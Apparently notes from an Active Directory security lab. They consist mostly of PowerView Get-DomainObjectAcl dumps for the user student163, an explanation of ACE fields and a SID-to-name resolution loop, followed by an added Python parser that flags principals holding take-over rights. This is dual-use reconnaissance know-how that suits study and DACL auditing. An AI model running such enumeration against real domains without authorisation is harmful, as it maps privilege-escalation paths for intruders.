BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-526
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-3-0
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit, ObjectInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ObjectInherit, ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ListChildren
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 4
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

How to read the output of Get-DomainObjectACL

From the output above we take one ACE and walk through its fields.


AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

On the ObjectDN, i.e. on student163, the security identifier S-1-5-32-544 holds the ActiveDirectoryRights
CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl and WriteOwner.

To convert the security identifier to a principal name, pipe the output through the following loop:
foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

This loop adds an 'IdentityName' property to every ACE in the output, so the security identifier can be
read as a principal name.
PS C:\Users\student163> Get-DomainObjectAcl -SamAccountName student163 -ResolveGUIDs | foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}
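As an added example that is not part of the original notes or of PowerView, the following Python reads a pasted dump like the ones above, decodes the numeric AccessMask into the same ActiveDirectoryRights names PowerShell prints (including why 983485 shows GenericRead rather than ReadControl), and resolves well-known SIDs offline the way the Convert-SidToName loop does. The RID fallback for domain SIDs such as -512 (blank in the loop's output) and the trimmed sample ACEs are constructed here, not taken from PowerView.

```python
"""Offline decoding of pasted Get-DomainObjectAcl output (added example, not PowerView code)."""
import re

# System.DirectoryServices.ActiveDirectoryRights member values, composites included.
ACTIVE_DIRECTORY_RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "GenericExecute": 0x20004, "GenericWrite": 0x20028, "GenericRead": 0x20094,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "GenericAll": 0xF01FF,
    "Synchronize": 0x100000, "AccessSystemSecurity": 0x1000000,
}
# Well-known SIDs seen in the dump, with the names Convert-SidToName printed for them.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone", "S-1-3-0": "Creator Owner", "S-1-5-10": "Principal Self",
    "S-1-5-11": "Authenticated Users", "S-1-5-18": "Local System",
    "S-1-5-9": "Enterprise Domain Controllers", "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-548": "BUILTIN\\Account Operators",
    "S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
}
# Fallback for domain SIDs the loop left blank: standard well-known RIDs (constructed mapping).
WELL_KNOWN_RIDS = {512: "Domain Admins", 517: "Cert Publishers", 519: "Enterprise Admins",
                   526: "Key Admins", 527: "Enterprise Key Admins", 553: "RAS and IAS Servers"}
# Rights that let the holder take over the object rather than only read it.
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "GenericWrite"}


def decode_access_mask(mask: int) -> str:
    """Format mask like .NET prints a [Flags] enum: take members from the largest value down
    whose bits are all still present, then list the matches ascending (983485 -> GenericRead)."""
    remaining, found = mask, []
    for name, value in sorted(ACTIVE_DIRECTORY_RIGHTS.items(), key=lambda kv: kv[1], reverse=True):
        if remaining & value == value:
            remaining -= value
            found.append((value, name))
    if remaining or not found:  # leftover unknown bits: .NET falls back to the number
        return str(mask)
    return ", ".join(name for _, name in sorted(found))


def resolve_sid(sid: str):
    """Well-known SID, else well-known domain RID, else None (unresolved, like a blank IdentityName)."""
    if sid in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[sid]
    m = re.fullmatch(r"S-1-5-21-\d+-\d+-\d+-(\d+)", sid)
    if m and int(m.group(1)) in WELL_KNOWN_RIDS:
        return f"{WELL_KNOWN_RIDS[int(m.group(1))]} (RID {m.group(1)})"
    return None


def parse_aces(text: str) -> list:
    """One dict per ACE (ACEs are separated by blank lines). A line without 'Key :' is a
    wrapped continuation of the previous value, like 'WriteDacl, WriteOwner' in the dump."""
    aces = []
    for block in re.split(r"\n\s*\n", text.strip()):
        ace, last_key = {}, None
        for line in block.splitlines():
            m = re.match(r"^\s*(\w+)\s*:\s*(.*)$", line)
            if m:
                last_key = m.group(1)
                ace[last_key] = m.group(2).strip()
            elif last_key and line.strip():
                ace[last_key] += " " + line.strip()
        if ace:
            aces.append(ace)
    return aces


def describe(ace: dict) -> dict:
    """Readable view of one ACE: principal (resolved here when IdentityName is blank) and decoded rights."""
    principal = ace.get("IdentityName") or resolve_sid(ace["SecurityIdentifier"]) or ace["SecurityIdentifier"]
    return {"principal": principal, "rights": decode_access_mask(int(ace["AccessMask"])),
            "inherited": ace.get("IsInherited") == "True"}


def control_holders(aces: list) -> list:
    """Principals holding a take-over right on the object: the first thing to check in a DACL review."""
    holders = []
    for ace in aces:
        d = describe(ace)
        granted = set(d["rights"].split(", ")) & CONTROL_RIGHTS
        if granted:
            holders.append((d["principal"], sorted(granted)))
    return holders


# Constructed sample: three ACEs from the page's dump, trimmed to the fields used here.
SAMPLE = """ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
IsInherited : True

ActiveDirectoryRights : GenericAll
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 983551
IsInherited : False
IdentityName :

ActiveDirectoryRights : ExtendedRight
SecurityIdentifier : S-1-1-0
AccessMask : 256
IsInherited : False
IdentityName : Everyone
"""
```

Running `control_holders(parse_aces(SAMPLE))` lists BUILTIN\Administrators (WriteDacl, WriteOwner) and Domain Admins (GenericAll), while the Everyone ACE carrying only ExtendedRight is left out.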

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Everyone

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Windows Authorization Access Group

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Terminal Server License Servers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Terminal Server License Servers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Send-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Receive-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Public-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Email-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName :

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Account Operators

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadControl
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131072
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Authenticated Users

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Local System

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
